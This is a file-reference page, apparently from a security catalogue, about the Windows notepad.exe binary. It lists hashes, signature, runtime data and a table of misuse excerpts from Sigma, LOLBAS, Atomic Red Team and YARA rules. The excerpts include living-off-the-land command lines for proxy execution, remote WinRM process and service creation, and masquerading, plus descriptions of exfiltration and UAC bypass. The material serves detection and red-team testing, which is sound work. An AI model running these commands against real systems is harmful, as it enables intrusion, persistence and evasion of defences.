notepad.exe

  • File Path: C:\Windows\SysWOW64\notepad.exe
  • Description: Notepad

Hashes

| Type | Hash |
|---|---|
| MD5 | E92D3A824A0578A50D2DD81B5060145F |
| SHA1 | 50EF7C645FD5CBB95D50FBADDF6213800F9296EC |
| SHA256 | 87F53BC444C05230CE439DBB127C03F2E374067D6FB08E91C834371FD9ECF661 |
| SHA384 | 94B1A77101BDDDEC053CF61624F984A858F9A284CE2067EC8497A29A23A056D25D16C4C4D658FEAD8FDE04F4D350F091 |
| SHA512 | 40D0AC6FA5A424B099923FCDB465E9A2F44569AF1C75CF05323315A8720517316A7E8627BE248CFF3A83382FB6DB1CF026161F627A39BC1908E63F67A34C0FD5 |
| SSDEEP | 3072:GLLvkpY5SnMwbv5RkorwMLuflibzL/cNArhCAEf7ngKpIcXNokJrzOxEPcZA8TJa:E6USNVRkIHXO7RN/1y6PcOwej/Hv |
| IMP | 291BF41874EDCDB21D447B43EE0E6B1F |
| PESHA1 | A449A35286CAC895B59970FC543E0E255D62A779 |
| PE256 | A3D73A766B718A3D19322043E6418EB9657F752543BDAFA9FD8BCBFA3E874625 |

Runtime Data

Window Title:

–help - Notepad

Open Handles:

| Path | Type |
|---|---|
| (R-D) C:\Windows\Fonts\StaticCache.dat | File |
| (R-D) C:\Windows\System32\en-US\notepad.exe.mui | File |
| (R-D) C:\Windows\SystemResources\notepad.exe.mun | File |
| (RW-) C:\Users\user | File |
| (RW-) C:\Windows | File |
| (RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 | File |
| \BaseNamedObjects__ComCatalogCache__ | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 | Section |
| \BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
| \BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
| \Sessions\1\BaseNamedObjects\windows_shell_global_counters | Section |
| \Sessions\1\Windows\Theme1175649999 | Section |
| \Windows\Theme601709542 | Section |

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\notepad.exe

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: NOTEPAD.EXE
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/76
  • VirusTotal Link: https://www.virustotal.com/gui/file/87f53bc444c05230ce439dbb127c03f2e374067d6fb08e91c834371fd9ecf661/detection

Possible Misuse

The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
|---|---|---|---|
| sigma | image_load_susp_image_load.yml | - '\notepad.exe' | DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | title: Notepad Making Network Connection | DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | description: Detects suspicious network connection by Notepad | DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ | DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | Image\|endswith: '\notepad.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks | DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Program Files\Notepad++\updater\GUP.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Program Files (x86)\Notepad++\updater\GUP.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - Execution of tools named GUP.exe and located in folders different than Notepad++\updater | DRL 1.0 |
| LOLBAS | Gpup.yml | Description: Execute another command through gpup.exe (Notepad++ binary). | |
| LOLBAS | Gpup.yml | - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe ' | |
| LOLBAS | Explorer.yml | - Command: explorer.exe C:\Windows\System32\notepad.exe | |
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | |
| LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. | |
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | |
| LOLBAS | Forfiles.yml | Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. | |
| LOLBAS | pester.yml | - Command: Pester.bat [/help\|?\|-?\|/?] "$null; notepad" | |
| LOLBAS | pester.yml | Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad | |
| LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' | |
| LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' | |
| LOLBAS | Cdb.yml | - Command: cdb.exe -cf x64_calc.wds -o notepad.exe | |
| LOLBAS | Dxcap.yml | - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe | |
| LOLBAS | Dxcap.yml | Description: Launch notepad as a subprocess of Dxcap.exe | |
| atomic-red-team | index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | cmd.exe /c %APPDATA%\notepad.exe /B | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | del /Q /F %APPDATA%\notepad.exe >nul 2>&1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | When the test completes, a new process will be started locally. A notepad application will be started when input is left on default. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | \| process_to_execute \| Name or path of process to execute. \| String \| notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | You should expect to see notepad.exe running after execution of this test. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | \| input_file \| Path to file to be exfiltrated. \| Path \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | \| input_file \| Path to file to exfiltrate \| Path \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute “notepad.exe” within | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.001.md | With default arguments, expect to see a MessageBox, with notepad’s icon in taskbar. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.001.md | \| process_id \| PID of input_arguments \| Integer \| (Start-Process notepad -PassThru).id\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | \| sponsor_binary_path \| Path of the sponsor binary (executable that will host the binary) \| String \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | \| spawnto_process_name \| Name of the process to spawn \| String \| notepad\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | This module executes notepad.exe from within the WINWORD.EXE process | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | Upon successful execution the test will open calculator and Notepad executable for 10 seconds. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Spawns a notepad.exe process as a child of the current process. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | \| parent_name \| Parent process to spoof from \| Path \| $Env:windir\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of “svchost.exe” and an Initiating Process Command Line of “svchost.exe -k netsvcs -p -s BITS” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | \| command_path \| Path of command to execute \| Path \| C:\Windows\system32\notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | forfiles /p c:\windows\system32 /m notepad.exe /c #{process} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | \| process \| Process to execute \| String \| notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | Copy-Item -Path "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe" -Destination "$Env:windir\System32\Tasks\notepad.exe" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | InstallUtilPath = "$Env:windir\System32\Tasks\notepad.exe" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.007.md | Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when successfully executed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.007.md | Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when successfully executed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | \| exe_to_launch \| Path of the executable to launch \| Path \| %windir%\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Change Default File Association From cmd.exe of hta to notepad. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | \| target_extension_handler \| txtfile maps to notepad.exe \| Path \| txtfile\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.003.md | After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.003.md | CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.010.md | AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don’t keep getting message boxes showing up. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | \| target_binary \| Binary To Attach To \| Path \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.002.md | After a reboot, Notepad.exe will be executed as child process of lsass.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | \| command.to.execute \| Command to execute \| String \| cmd.exe /c notepad.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | folder to view that the alternate data stream exists. To view the data in the alternate data stream, run “notepad T1564.004_has_ads.txt:adstest.txt” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run “notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt” in the %temp% folder. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | \| gup_executable \| GUP is an open source signed binary used by Notepad++ for software updates \| Path \| PathToAtomicsFolder\T1574.002\bin\GUP.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
| signature-base | apt_bluetermite_emdivi.yar | $s4 = "\NOTEPAD.EXE" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_molerats_jul17.yar | $s2 = "Notepad++.exe" fullword wide | CC BY-NC 4.0 |
| signature-base | apt_olympic_destroyer.yar | $s3 = "\system32\notepad.exe" fullword wide | CC BY-NC 4.0 |
| signature-base | apt_poisonivy.yar | $s0 = "\notepad.exe" fullword ascii /* score: '11.025' */ | CC BY-NC 4.0 |
| signature-base | apt_ta17_293A.yar | $au2 = "/notepad.png" | CC BY-NC 4.0 |
| signature-base | apt_wildneutron.yar | $n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s" fullword ascii /* PEStudio Blacklist: strings / / score: '46.00' */ | CC BY-NC 4.0 |
| signature-base | apt_woolengoldfish.yar | $s4 = "oShellLink.IconLocation = "notepad.exe, 0"" fullword | CC BY-NC 4.0 |
| signature-base | crime_ransom_ragna_locker.yar | $s2 = "\notepad.exe" fullword wide /* Show ransom note to the victim*/ | CC BY-NC 4.0 |
| signature-base | gen_cn_hacktools.yar | $s14 = "NOTEPAD.EXE result.txt" fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_powershell_empire.yar | $s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | description = "Abnormal notepad.exe - typical strings not found in file" | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | $winxp = "Software\Microsoft\Notepad" wide | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | $winxp_de = "Software\Microsoft\Notepad" wide | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | filename == "notepad.exe" | CC BY-NC 4.0 |
| stockpile | 3796a00b-b11d-4731-b4ca-275a07d83299.yml | Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; | Apache-2.0 |

MIT License. Copyright (c) 2020-2021 Strontic.